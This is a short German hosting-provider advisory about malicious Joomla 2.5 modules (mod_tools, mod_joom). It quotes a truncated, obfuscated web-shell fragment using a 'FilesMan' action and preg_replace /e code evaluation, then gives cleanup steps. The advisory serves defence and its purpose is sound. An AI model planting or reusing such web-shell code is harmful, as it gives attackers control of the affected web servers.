Wieder tauchen auf einigen unserer Kundenaccounts fremde Dateien auf. Aktuell handelt es sich um Module die in Joomla 2.5 installiert wurden. mod_tools und mod_joom können also gefährliche Inhalte haben!!!
Liste der Hacker-Dateien
~/modules/mod_tools/mod_tools.php~/modules/mod_joom/mod_joom.php
Inhalt der mod_tools.php
<?php # $auth_pass = "549f1673cebe855799612017b0242e4386";$color = "#df5";$default_action = 'FilesMan';$default_use_ajax = true;$default_charset = 'Windows-1251';preg_replace("/.*/e",ippq(...)Kn6fwE='\x29\x29\x29\x3B",".");?>
Im Backend erscheinen unter Module auch unbekannte Einträge wie "System", "System1" und "Tools". Diese sollten schnellstmöglich deaktiviert werden. Danach via FTP prüfen ob die Ordner "mod_tools" und "mod_joom" aus dem Verzeichnis "modules" gelöscht wurden.
Häufig werden im Stammverzeichnis php-Dateien gefunden. Wenn außer der "index.php" und der "configuration.php" noch weitere PHP-Dateien zu finden sind sollten diese geprüft werden. Es handelt sich dann nicht um Joomla-Corde Dateien.
Bei anderen Beiträgen haben wir bereits Tipps für sichere Joomla Webseiten gegeben. Neben dem Joomla hmei7 Hack haben wir auch Hinweise für die Beseitigung des Joomla base64 Hacks gegeben. Wenn Sie diese Hinweise beachten sollte Ihre Webseite sicher sein.
